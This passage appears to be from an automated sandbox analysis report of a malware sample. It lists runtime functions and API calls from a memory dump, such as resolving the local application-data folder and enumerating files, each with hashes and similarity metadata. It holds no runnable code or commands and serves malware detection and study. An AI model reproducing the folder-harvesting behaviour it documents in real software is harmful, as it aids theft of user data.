                        • __amsg_exit.LIBCMT ref: 006AC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 006AC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
                        • Instruction ID: a16fb6ab7003d5cbd9dda262588bce2a76fe2cdfe3e240d0775e5f2d5e477e4b
                        • Opcode Fuzzy Hash: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
                        • Instruction Fuzzy Hash: 45F090729006049FD7A1BFB85806B8D73A3AF02730F24514DF404A62D3CB649D81DF9E
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4F7A
                        • lstrcat.KERNEL32(?,006B1070), ref: 006A4F97
                        • lstrcat.KERNEL32(?,01269190), ref: 006A4FAB
                        • lstrcat.KERNEL32(?,006B1074), ref: 006A4FBD
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
                          • Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                          • Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                          • Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: cdc41293ba9d231648d1aff1db9dba863deef8bdaa3edff432715e984753af19
                        • Instruction ID: ec403992bb3081ecc47b7592101c25b84e5a4b7b685681d10bd8dfd88f23388f
                        • Opcode Fuzzy Hash: cdc41293ba9d231648d1aff1db9dba863deef8bdaa3edff432715e984753af19
                        • Instruction Fuzzy Hash: 7D21D0B69002046BC794F7B0DC46EEE337DB755300F40465DB64557181DE749AC8CF96